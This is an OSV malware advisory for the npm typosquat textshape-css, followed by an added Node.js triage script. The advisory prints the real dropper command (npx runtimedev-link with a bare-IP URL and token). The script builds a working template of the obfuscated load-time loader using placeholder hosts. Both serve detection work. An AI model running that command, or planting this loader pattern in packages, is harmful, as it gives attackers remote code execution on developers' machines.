textshape-css @1.0.0
Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:45 PM UTC
OSV ID
MAL-2026-6475
Ecosystem
npm
Summary
The package presents itself as a Tailwind CSS typography plugin (its name, description, and source tree clone @tailwindcss/typography), but src/index.js appends an obfuscated payload that runs at module load. Char-code arrays at the bottom of src/index.js decode to child_process, spawn/exec, /bin/sh, and the command npx -y runtimedev-link@latest --token "http://194.11.226.41:4000|zRlY7_JxvFY8_Zhhu8ih24iW_dT5Rb_9". A trailing _.y(); invokes this immediately whenever any consumer does require('textshape-css') or import 'textshape-css'. On POSIX it spawns /bin/sh -c 'nohup ... >/dev/null 2>&1' detached with stdio ignored; on Windows it goes via child_process.exec with windowsHide.

The effect is to fetch and run an unpinned third-party npm package (runtimedev-link@latest) that beacons to a bare IP (194.11.226.41:4000) over plain HTTP with an attacker-supplied token: a remote-code-execution dropper. Because execution happens at require time, any build, lint or test step that loads the plugin triggers it, and because the second stage is resolved from the registry at run time, a consumer's lock file does not pin or audit it. The package name and description are a near-verbatim typosquat of @tailwindcss/typography, targeting developers searching for that plugin.
Source: amazon-inspector (4e596e1ea1365aadfa6c75047b664bb41b29b60828595b9271d4c2c217476b60)
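The following Node.js script is an added example, not code from this advisory, from the package, or from the source that reported it. It shows the obfuscation pattern the summary describes (string constants stored as char-code arrays, decoded with String.fromCharCode, a computed require() of child_process, and a detached shell spawn invoked at load time) and a simple way to triage a package's source for it: decode every small-integer array literal, then match the decoded text against the indicators the advisory lists. The sample source is constructed here to mimic that shape; the second-stage package name example-dropper and the address 192.0.2.10 are placeholders, not the real values.

```javascript
// Indicator patterns drawn from the strings the advisory says the payload decodes to.
const INDICATORS = {
  child_process: /child_process/,
  spawn_or_exec: /\b(?:spawn|exec|spawnSync|execSync)\b/,
  posix_shell: /\/bin\/sh\b/,
  npx_auto_install: /\bnpx\s+-y\b/,
  bare_ip_url: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/,
  nohup_detach: /\bnohup\b/,
};

// Array literal of at least four small decimal integers, e.g. [99,104,105,108].
const CHAR_CODE_ARRAY = /\[\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*\]/g;

// Decode every numeric array literal whose values are all printable ASCII.
// Returns [{ offset, text }] in source order.
function decodeCharCodeArrays(source) {
  const out = [];
  for (const m of source.matchAll(CHAR_CODE_ARRAY)) {
    const codes = m[1].split(',').map((s) => Number(s.trim()));
    if (codes.every((c) => c >= 32 && c <= 126)) {
      out.push({ offset: m.index, text: String.fromCharCode(...codes) });
    }
  }
  return out;
}

// A require() whose argument is not a plain string literal: the module name is computed at run time,
// which is how the payload reaches child_process without that name appearing in the source.
function hasDynamicRequire(source) {
  return /\brequire\(\s*(?!['"`])[^)]/.test(source);
}

// Return the sorted list of indicator names found. Decoded strings are checked one by one and
// concatenated, because a command is often split across several arrays.
function scanSource(source) {
  const decoded = decodeCharCodeArrays(source).map((d) => d.text);
  const candidates = decoded.concat(decoded.join(' '));
  const found = new Set();
  for (const [name, re] of Object.entries(INDICATORS)) {
    if (candidates.some((t) => re.test(t))) found.add(name);
  }
  if (hasDynamicRequire(source)) found.add('dynamic_require');
  return [...found].sort();
}

// Builds a char-code array literal; used only to construct the sample below.
function toCharCodeArray(s) {
  return '[' + Array.from(s, (ch) => ch.charCodeAt(0)).join(',') + ']';
}

// Constructed sample in the shape the advisory describes (not the package's actual code):
// a plausible plugin body, then char-code arrays decoded at load time and an immediate _.y() call.
// example-dropper and 192.0.2.10 (TEST-NET-1) are placeholders.
const SAMPLE_SOURCE = `
const plugin = require('tailwindcss/plugin');
module.exports = plugin(function ({ addComponents }) {
  addComponents({ '.prose': { maxWidth: '65ch' } });
});
const _ = {
  a: ${toCharCodeArray('child_process')},
  b: ${toCharCodeArray('spawn')},
  c: ${toCharCodeArray('/bin/sh')},
  d: ${toCharCodeArray('npx -y example-dropper@latest --token "http://192.0.2.10:4000|TOKEN"')},
  s: (a) => String.fromCharCode(...a),
  y() {
    const cp = require(this.s(this.a));
    cp[this.s(this.b)](this.s(this.c), ['-c', 'nohup ' + this.s(this.d) + ' >/dev/null 2>&1'],
      { detached: true, stdio: 'ignore' }).unref();
  },
};
_.y();
`;

// Constructed benign plugin for comparison.
const BENIGN_SOURCE = `
const plugin = require('tailwindcss/plugin');
module.exports = plugin(function ({ addUtilities }) {
  addUtilities({ '.text-balance': { textWrap: 'balance' } });
});
`;

console.log('sample:', scanSource(SAMPLE_SOURCE));
console.log('benign:', scanSource(BENIGN_SOURCE));
```

Run against the constructed sample, scanSource reports child_process, spawn_or_exec, posix_shell, npx_auto_install, bare_ip_url and dynamic_require; nohup is not reported because in the sample it is a plain string literal rather than a char-code array, which is a reminder that this decoder only sees what is numerically encoded and should be run alongside a plain-text grep. Because the payload executes on require, the safe way to inspect a suspect package is to read the tarball contents (npm pack, then extract) and run a scanner like this over the files, never to install and import it.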